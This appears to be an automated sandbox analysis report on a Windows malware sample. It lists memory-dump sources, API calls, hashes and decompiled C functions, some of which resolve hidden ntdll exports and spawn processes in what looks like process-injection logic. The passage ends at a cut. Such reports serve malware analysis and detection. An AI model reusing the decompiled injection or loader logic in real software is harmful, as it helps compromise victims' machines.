                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                  • String ID:
                  • API String ID: 3080378247-0
                  • Opcode ID: 2fb0b94c614cdd13d7d97324218fe983b8fac4489e6a7d6f63baa4860c3a9197
                  • Instruction ID: 26d7a71d83c855c9bca8c01a447b0a4a81e4030e20638b794154dc7aece0ca45
                  • Opcode Fuzzy Hash: 2fb0b94c614cdd13d7d97324218fe983b8fac4489e6a7d6f63baa4860c3a9197
                  • Instruction Fuzzy Hash: 4F61AF31500601AFC721EB68EC49FAA7BE8EB48350F440614F908D7271EFF9E906DB66
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _memset.LIBCMT ref: 6E109335
                    • Part of subcall function 6E10B752: __getptd_noexit.LIBCMT ref: 6E10B752
                  • __gmtime64_s.LIBCMT ref: 6E1093CE
                  • __gmtime64_s.LIBCMT ref: 6E109404
                  • __gmtime64_s.LIBCMT ref: 6E109421
                  • __allrem.LIBCMT ref: 6E109477
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E109493
                  • __allrem.LIBCMT ref: 6E1094AA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1094C8
                  • __allrem.LIBCMT ref: 6E1094DF
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1094FD
                  • __invoke_watson.LIBCMT ref: 6E10956E
                  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E10957D
                  • __aulldiv.LIBCMT ref: 6E10959D
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$Time$FileSystem__aulldiv__getptd_noexit__invoke_watson_memset
                  • String ID:
                  • API String ID: 2599720210-0
                  • Opcode ID: efc6ac646cefa49946561dc786cae5171483882cf691f7f8f7c5a827e1585cf6
                  • Instruction ID: 760331536417768322402fe68380dcd31fc42ed4fe2e146fcec35f652f04cffe
                  • Opcode Fuzzy Hash: efc6ac646cefa49946561dc786cae5171483882cf691f7f8f7c5a827e1585cf6
                  • Instruction Fuzzy Hash: F291A9B1A00706ABD714DEF9CC71B9AB7ACAF85324F14856AE514DB6C0EF70D9809B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                  • String ID:
                  • API String ID: 1442030790-0
                  • Opcode ID: 7373143fecbf684e373d6eca519a832cb39b6f7c8aba6a6f015d8ec12c2314cf
                  • Instruction ID: 2ff77344f764249749dfe2d4eb841ac38127afe28d307e67ac2d5beeb3f61c62
                  • Opcode Fuzzy Hash: 7373143fecbf684e373d6eca519a832cb39b6f7c8aba6a6f015d8ec12c2314cf
                  • Instruction Fuzzy Hash: DF21D43510C601AEEB619FE5DC04ECA77ADEF817A9B214839E444550E4EF3198D0FF90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlDecodePointer.NTDLL ref: 6E10AD0E
                  • _free.LIBCMT ref: 6E10AD27
                    • Part of subcall function 6E10AB1D: HeapFree.KERNEL32(00000000,00000000,?,6E10DD47,00000000,00000001,00000000,?,?,?,6E10A62D,6E108593), ref: 6E10AB31
                    • Part of subcall function 6E10AB1D: GetLastError.KERNEL32(00000000,?,6E10DD47,00000000,00000001,00000000,?,?,?,6E10A62D,6E108593), ref: 6E10AB43
                  • _free.LIBCMT ref: 6E10AD3A
                  • _free.LIBCMT ref: 6E10AD58
                  • _free.LIBCMT ref: 6E10AD6A
                  • _free.LIBCMT ref: 6E10AD7B
                  • _free.LIBCMT ref: 6E10AD86
                  • _free.LIBCMT ref: 6E10ADAA
                  • RtlEncodePointer.NTDLL(6E24E390), ref: 6E10ADB1
                  • _free.LIBCMT ref: 6E10ADC6
                  • _free.LIBCMT ref: 6E10ADDC
                  • _free.LIBCMT ref: 6E10AE04
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                  • String ID:
                  • API String ID: 3064303923-0
                  • Opcode ID: cd0c1f7b04153db5c440f1187e2507296fcb654216a58764c56bec7bff027ee9
                  • Instruction ID: 65f4b123d99220f5cdf7a931add5cd46c4695cdff37ae057fd17f1c8ff8a8d64
                  • Opcode Fuzzy Hash: cd0c1f7b04153db5c440f1187e2507296fcb654216a58764c56bec7bff027ee9
                  • Instruction Fuzzy Hash: B021C972900A11DBEF11EF94D944D5A3FAABB56765360093DE8249B200CF3068C0FFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                  • String ID:
                  • API String ID: 3432600739-0
                  • Opcode ID: 459a2fd6764e80c51324d554872d62aed3060471a95b26e883684b011ffcf603
                  • Instruction ID: 038bdeb24cff40f47c13a7f57fce405bfa607c141cd564eca6d3cf3e6215b4f0
                  • Opcode Fuzzy Hash: 459a2fd6764e80c51324d554872d62aed3060471a95b26e883684b011ffcf603
                  • Instruction Fuzzy Hash: 9641A23290C30AAFDB00DFE4D844BCE77B8AB5531AF208939E91896184DB7596C6FF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • std::exception::exception.LIBCMT ref: 6E1085EA
                    • Part of subcall function 6E10A60F: std::exception::_Copy_str.LIBCMT ref: 6E10A628
                  • __CxxThrowException@8.LIBCMT ref: 6E1085FF
                    • Part of subcall function 6E1095D4: RaiseException.KERNEL32(?,?,6E13D110,6E13B25C,?,?,?,?,?,6E108556,6E13D110,6E13B25C,?,00000001), ref: 6E109629
                  • std::exception::exception.LIBCMT ref: 6E108618
                  • __CxxThrowException@8.LIBCMT ref: 6E10862D
                  • std::regex_error::regex_error.LIBCPMT ref: 6E10863F
                    • Part of subcall function 6E1083AB: std::exception::exception.LIBCMT ref: 6E1083C5
                  • __CxxThrowException@8.LIBCMT ref: 6E10864D
                  • std::exception::exception.LIBCMT ref: 6E108666
                  • __CxxThrowException@8.LIBCMT ref: 6E10867B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                  • String ID: bad function call
                  • API String ID: 2464034642-3612616537
                  • Opcode ID: d7c83af803136d1c014a78ff62431d9fc7f3720dba89e5621f5b37e47a4090c1
                  • Instruction ID: 6b50be22f34c0701859108c1f9b7dea421f1d16f557bb625ace096dae80f13e8
                  • Opcode Fuzzy Hash: d7c83af803136d1c014a78ff62431d9fc7f3720dba89e5621f5b37e47a4090c1
                  • Instruction Fuzzy Hash: 3411EF78C0421CBBCB00EFE5C459CCEBB7CEB44244B508866ED25A7244EB34E6899B95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00BB4B3D(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				long _v16;
                  				intOrPtr _v20;
                  				signed int _v24;
                  				void* __esi;
                  				long _t43;
                  				intOrPtr _t44;
                  				intOrPtr _t46;
                  				void* _t48;
                  				void* _t49;
                  				void* _t50;
                  				intOrPtr _t54;
                  				intOrPtr _t57;
                  				void* _t58;
                  				void* _t59;
                  				void* _t60;
                  				intOrPtr _t66;
                  				void* _t71;
                  				void* _t74;
                  				intOrPtr _t75;
                  				void* _t77;
                  				intOrPtr _t79;
                  				intOrPtr* _t80;
                  				intOrPtr _t91;
                  
                  				_t79 =  *0xbbd33c; // 0x3619bc8
                  				_v24 = 8;
                  				_t43 = GetTickCount();
                  				_push(5);
                  				_t74 = 0xa;
                  				_v16 = _t43;
                  				_t44 = E00BB1BF8(_t74,  &_v16);
                  				_v8 = _t44;
                  				if(_t44 == 0) {
                  					_v8 = 0xbbc1ac;
                  				}
                  				_t46 = E00BB5BBE(_t79);
                  				_v12 = _t46;
                  				if(_t46 != 0) {
                  					_t80 = __imp__;
                  					_t48 =  *_t80(_v8, _t71);
                  					_t49 =  *_t80(_v12);
                  					_t50 =  *_t80(_a4);
                  					_t54 = E00BB98E4(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                  					_v20 = _t54;
                  					if(_t54 != 0) {
                  						_t75 =  *0xbbd2a4; // 0x2a5a5a8
                  						_t16 = _t75 + 0xbbeb28; // 0x530025
                  						 *0xbbd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                  						_push(4);
                  						_t77 = 5;
                  						_t57 = E00BB1BF8(_t77,  &_v16);
                  						_v8 = _t57;
                  						if(_t57 == 0) {
                  							_v8 = 0xbbc1b0;
                  						}
                  						_t58 =  *_t80(_v8);
                  						_t59 =  *_t80(_v12);
                  						_t60 =  *_t80(_a4);
                  						_t91 = E00BB98E4(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                  						if(_t91 == 0) {
                  							E00BB5DE8(_v20);
                  						} else {
                  							_t66 =  *0xbbd2a4; // 0x2a5a5a8
                  							_t31 = _t66 + 0xbbec48; // 0x73006d
                  							 *0xbbd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                  							 *_a16 = _v20;
                  							_v24 = _v24 & 0x00000000;
                  							 *_a20 = _t91;
                  						}
                  					}
                  					E00BB5DE8(_v12);
                  				}
                  				return _v24;
                  			}





























                  APIs
                  • GetTickCount.KERNEL32 ref: 00BB4B52
                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 00BB4B92
                  • lstrlen.KERNEL32(00000000), ref: 00BB4B9B
                  • lstrlen.KERNEL32(00000000), ref: 00BB4BA2
                  • lstrlenW.KERNEL32(80000002), ref: 00BB4BAF
                  • lstrlen.KERNEL32(?,00000004), ref: 00BB4C0F
                  • lstrlen.KERNEL32(?), ref: 00BB4C18
                  • lstrlen.KERNEL32(?), ref: 00BB4C1F
                  • lstrlenW.KERNEL32(?), ref: 00BB4C26
                    • Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrlen$CountFreeHeapTick
                  • String ID:
                  • API String ID: 2535036572-0
                  • Opcode ID: 571a6091a26ced298a776cddfe392a0bb5ff1f7c1e0148e31e0ac70ab50d75a0
                  • Instruction ID: 77f7b7a6eb48c705c7f2b559a3a99e1b01f7dfebb89f4bdcefec4b65c5c579bd
                  • Opcode Fuzzy Hash: 571a6091a26ced298a776cddfe392a0bb5ff1f7c1e0148e31e0ac70ab50d75a0
                  • Instruction Fuzzy Hash: 94414C72900119EBCF11AFA8CD099EEBFB5FF44354F154191F904A7222EBB5DA11EB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00BB5CB0(void* __eax, void* __ecx) {
                  				long _v8;
                  				char _v12;
                  				void* _v16;
                  				void* _v28;
                  				long _v32;
                  				void _v104;
                  				char _v108;
                  				long _t36;
                  				intOrPtr _t40;
                  				intOrPtr _t47;
                  				intOrPtr _t50;
                  				void* _t58;
                  				void* _t68;
                  				intOrPtr* _t70;
                  				intOrPtr* _t71;
                  
                  				_t1 = __eax + 0x14; // 0x74183966
                  				_t69 =  *_t1;
                  				_t36 = E00BB8C20(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                  				_v8 = _t36;
                  				if(_t36 != 0) {
                  					L12:
                  					return _v8;
                  				}
                  				E00BBA899( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                  				_t40 = _v12(_v12);
                  				_v8 = _t40;
                  				if(_t40 == 0 && ( *0xbbd260 & 0x00000001) != 0) {
                  					_v32 = 0;
                  					asm("stosd");
                  					asm("stosd");
                  					asm("stosd");
                  					_v108 = 0;
                  					memset( &_v104, 0, 0x40);
                  					_t47 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t18 = _t47 + 0xbbe3e6; // 0x73797325
                  					_t68 = E00BB93FD(_t18);
                  					if(_t68 == 0) {
                  						_v8 = 8;
                  					} else {
                  						_t50 =  *0xbbd2a4; // 0x2a5a5a8
                  						_t19 = _t50 + 0xbbe747; // 0x3618cef
                  						_t20 = _t50 + 0xbbe0af; // 0x4e52454b
                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                  						if(_t71 == 0) {
                  							_v8 = 0x7f;
                  						} else {
                  							_v108 = 0x44;
                  							E00BB91D9();
                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                  							_push(1);
                  							E00BB91D9();
                  							if(_t58 == 0) {
                  								_v8 = GetLastError();
                  							} else {
                  								CloseHandle(_v28);
                  								CloseHandle(_v32);
                  							}
                  						}
                  						HeapFree( *0xbbd238, 0, _t68);
                  					}
                  				}
                  				_t70 = _v16;
                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                  				E00BB5DE8(_t70);
                  				goto L12;
                  			}



















                  APIs
                    • Part of subcall function 00BB8C20: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00BB5CCC,?,00000001,?,?,00000000,00000000), ref: 00BB8C45
                    • Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00BB8C67
                    • Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00BB8C7D
                    • Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00BB8C93
                    • Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00BB8CA9
                    • Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00BB8CBF
                  • memset.NTDLL ref: 00BB5D1A
                    • Part of subcall function 00BB93FD: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00BB197C,63699BCE,00BB89EF,73797325), ref: 00BB940E
                    • Part of subcall function 00BB93FD: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00BB9428
                  • GetModuleHandleA.KERNEL32(4E52454B,03618CEF,73797325), ref: 00BB5D50
                  • GetProcAddress.KERNEL32(00000000), ref: 00BB5D57
                  • HeapFree.KERNEL32(00000000,00000000), ref: 00BB5DBF
                    • Part of subcall function 00BB91D9: GetProcAddress.KERNEL32(36776F57,00BB5762), ref: 00BB91F4
                  • CloseHandle.KERNEL32(00000000,00000001), ref: 00BB5D9C
                  • CloseHandle.KERNEL32(?), ref: 00BB5DA1
                  • GetLastError.KERNEL32(00000001), ref: 00BB5DA5
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                  • String ID:
                  • API String ID: 3075724336-0
                  • Opcode ID: dd3f6de82999e90e49bd97668beb05d0f04f27cfb33c2d41500cbc10b34583ff
                  • Instruction ID: f76aaaf08f049188b2fd7e919fd037abdcd2c8acc84a51c68b1aa1753d0de225
                  • Opcode Fuzzy Hash: dd3f6de82999e90e49bd97668beb05d0f04f27cfb33c2d41500cbc10b34583ff
                  • Instruction Fuzzy Hash: 2C3112B1800609AFDB21AFA4DC89EEEBBFCEF08344F1005A5F605A7121D7B49D45DB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 63%
                  			E00BB61B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				intOrPtr _t9;
                  				intOrPtr _t13;
                  				char* _t28;
                  				void* _t33;
                  				void* _t34;
                  				char* _t36;
                  				intOrPtr* _t40;
                  				char* _t41;
                  				char* _t42;
                  				char* _t43;
                  
                  				_t34 = __edx;
                  				_push(__ecx);
                  				_t9 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t1 = _t9 + 0xbbe62c; // 0x253d7325
                  				_t36 = 0;
                  				_t28 = E00BB5B16(__ecx, _t1);
                  				if(_t28 != 0) {
                  					_t40 = __imp__;
                  					_t13 =  *_t40(_t28);
                  					_v8 = _t13;
                  					_t41 = E00BB98E4(_v8 +  *_t40(_a4) + 1);
                  					if(_t41 != 0) {
                  						strcpy(_t41, _t28);
                  						_pop(_t33);
                  						__imp__(_t41, _a4);
                  						_t36 = E00BB4D6A(_t34, _t41, _a8);
                  						E00BB5DE8(_t41);
                  						_t42 = E00BBA543(StrTrimA(_t36, "="), _t36);
                  						if(_t42 != 0) {
                  							E00BB5DE8(_t36);
                  							_t36 = _t42;
                  						}
                  						_t43 = E00BB8D06(_t36, _t33);
                  						if(_t43 != 0) {
                  							E00BB5DE8(_t36);
                  							_t36 = _t43;
                  						}
                  					}
                  					E00BB5DE8(_t28);
                  				}
                  				return _t36;
                  			}















                  APIs
                    • Part of subcall function 00BB5B16: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,00BB61D3,253D7325,00000000,00000000,7742C740,?,?,00BB6028,?), ref: 00BB5B7D
                    • Part of subcall function 00BB5B16: sprintf.NTDLL ref: 00BB5B9E
                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00BB6028,?,036195B0), ref: 00BB61E4
                  • lstrlen.KERNEL32(?,?,?,00BB6028,?,036195B0), ref: 00BB61EC
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • strcpy.NTDLL ref: 00BB6203
                  • lstrcat.KERNEL32(00000000,?), ref: 00BB620E
                    • Part of subcall function 00BB4D6A: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00BB621D,00000000,?,?,?,00BB6028,?,036195B0), ref: 00BB4D81
                    • Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4
                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BB6028,?,036195B0), ref: 00BB622B
                    • Part of subcall function 00BBA543: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00BB6237,00000000,?,?,00BB6028,?,036195B0), ref: 00BBA54D
                    • Part of subcall function 00BBA543: _snprintf.NTDLL ref: 00BBA5AB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                  • String ID: =
                  • API String ID: 2864389247-1428090586
                  • Opcode ID: 2c9d8f60108eeb6c088ccd5dc2393afbf5c6e16756c1fad42a37bd179f02543c
                  • Instruction ID: d7c898449975427963d50d7689972e5fb40e9e6cd9c3315bb7ffb7b534efc543
                  • Opcode Fuzzy Hash: 2c9d8f60108eeb6c088ccd5dc2393afbf5c6e16756c1fad42a37bd179f02543c
                  • Instruction Fuzzy Hash: A611C633A015256B4A22BBB49C46DFF3BDCDF9976030501A6F605A7101DEF8CD0297A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __init_pointers.LIBCMT ref: 6E10DE09
                    • Part of subcall function 6E10AF51: RtlEncodePointer.NTDLL(00000000), ref: 6E10AF54
                    • Part of subcall function 6E10AF51: __initp_misc_winsig.LIBCMT ref: 6E10AF6F
                    • Part of subcall function 6E10AF51: GetModuleHandleW.KERNEL32(6E135EE8), ref: 6E110D88
                  • __mtinitlocks.LIBCMT ref: 6E10DE0E
                  • __mtterm.LIBCMT ref: 6E10DE17
                    • Part of subcall function 6E10DE7F: RtlDeleteCriticalSection.NTDLL ref: 6E111CA5
                    • Part of subcall function 6E10DE7F: _free.LIBCMT ref: 6E111CAC
                    • Part of subcall function 6E10DE7F: RtlDeleteCriticalSection.NTDLL(6E13D520), ref: 6E111CCE
                  • __calloc_crt.LIBCMT ref: 6E10DE3C
                  • __initptd.LIBCMT ref: 6E10DE5E
                  • GetCurrentThreadId.KERNEL32 ref: 6E10DE65
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                  • String ID:
                  • API String ID: 1551663144-0
                  • Opcode ID: 547409bd65bb3eb13e1dd4754749d55ec658980e68e606a51e104b0157afd6b9
                  • Instruction ID: 993a8c25632e8661ad531390bd2b64d2173732f0b2b40d816222f2ecd0542779
                  • Opcode Fuzzy Hash: 547409bd65bb3eb13e1dd4754749d55ec658980e68e606a51e104b0157afd6b9
                  • Instruction Fuzzy Hash: 3FF0F632509A125FE6B4BAF03C007CB3698AF2267CB214E29E474C50D4FF2084C07955
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 00BB97B9
                  • SysAllocString.OLEAUT32(0070006F), ref: 00BB97CD
                  • SysAllocString.OLEAUT32(00000000), ref: 00BB97DF
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB9847
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB9856
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB9861
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 60b4536539a9100cacd6d84ec2051d9da7371673958537dede9ac608f3d80ed9
                  • Instruction ID: 8a69591a8757160eddac677c7dfef316d728f1f59adeb3a810fd288c83ba9edd
                  • Opcode Fuzzy Hash: 60b4536539a9100cacd6d84ec2051d9da7371673958537dede9ac608f3d80ed9
                  • Instruction Fuzzy Hash: 6E412135D00609ABDB01EFB8D845AEFBBBAEF49310F144465EA15EB220DBB1DD05CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                  • String ID:
                  • API String ID: 3534693527-0
                  • Opcode ID: fef238e8e29acb2b7113aadd19b2aad9475b8885c9fbbf16980cc4140cc2d2bb
                  • Instruction ID: 7847825165dd8bc58f23a06ed04b14069dcfbc85c04d1073d4c4b73bd0191e70
                  • Opcode Fuzzy Hash: fef238e8e29acb2b7113aadd19b2aad9475b8885c9fbbf16980cc4140cc2d2bb
                  • Instruction Fuzzy Hash: 74313C71A0C615AAD7119AE48C08BDE77689F15BA4F234835D824DF38CDF74CAC2A7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB8C20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                  				intOrPtr _v8;
                  				intOrPtr _t23;
                  				intOrPtr _t26;
                  				_Unknown_base(*)()* _t28;
                  				intOrPtr _t30;
                  				_Unknown_base(*)()* _t32;
                  				intOrPtr _t33;
                  				_Unknown_base(*)()* _t35;
                  				intOrPtr _t36;
                  				_Unknown_base(*)()* _t38;
                  				intOrPtr _t39;
                  				_Unknown_base(*)()* _t41;
                  				intOrPtr _t44;
                  				struct HINSTANCE__* _t48;
                  				intOrPtr _t54;
                  
                  				_t54 = E00BB98E4(0x20);
                  				if(_t54 == 0) {
                  					_v8 = 8;
                  				} else {
                  					_t23 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t1 = _t23 + 0xbbe11a; // 0x4c44544e
                  					_t48 = GetModuleHandleA(_t1);
                  					_t26 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t2 = _t26 + 0xbbe769; // 0x7243775a
                  					_v8 = 0x7f;
                  					_t28 = GetProcAddress(_t48, _t2);
                  					 *(_t54 + 0xc) = _t28;
                  					if(_t28 == 0) {
                  						L8:
                  						E00BB5DE8(_t54);
                  					} else {
                  						_t30 =  *0xbbd2a4; // 0x2a5a5a8
                  						_t5 = _t30 + 0xbbe756; // 0x614d775a
                  						_t32 = GetProcAddress(_t48, _t5);
                  						 *(_t54 + 0x10) = _t32;
                  						if(_t32 == 0) {
                  							goto L8;
                  						} else {
                  							_t33 =  *0xbbd2a4; // 0x2a5a5a8
                  							_t7 = _t33 + 0xbbe40b; // 0x6e55775a
                  							_t35 = GetProcAddress(_t48, _t7);
                  							 *(_t54 + 0x14) = _t35;
                  							if(_t35 == 0) {
                  								goto L8;
                  							} else {
                  								_t36 =  *0xbbd2a4; // 0x2a5a5a8
                  								_t9 = _t36 + 0xbbe4d2; // 0x4e6c7452
                  								_t38 = GetProcAddress(_t48, _t9);
                  								 *(_t54 + 0x18) = _t38;
                  								if(_t38 == 0) {
                  									goto L8;
                  								} else {
                  									_t39 =  *0xbbd2a4; // 0x2a5a5a8
                  									_t11 = _t39 + 0xbbe779; // 0x6c43775a
                  									_t41 = GetProcAddress(_t48, _t11);
                  									 *(_t54 + 0x1c) = _t41;
                  									if(_t41 == 0) {
                  										goto L8;
                  									} else {
                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                  										_t44 = E00BB241F(_t54, _a8);
                  										_v8 = _t44;
                  										if(_t44 != 0) {
                  											goto L8;
                  										} else {
                  											 *_a12 = _t54;
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _v8;
                  			}

                  APIs
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00BB5CCC,?,00000001,?,?,00000000,00000000), ref: 00BB8C45
                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00BB8C67
                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00BB8C7D
                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00BB8C93
                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00BB8CA9
                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00BB8CBF
                    • Part of subcall function 00BB241F: memset.NTDLL ref: 00BB249E
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
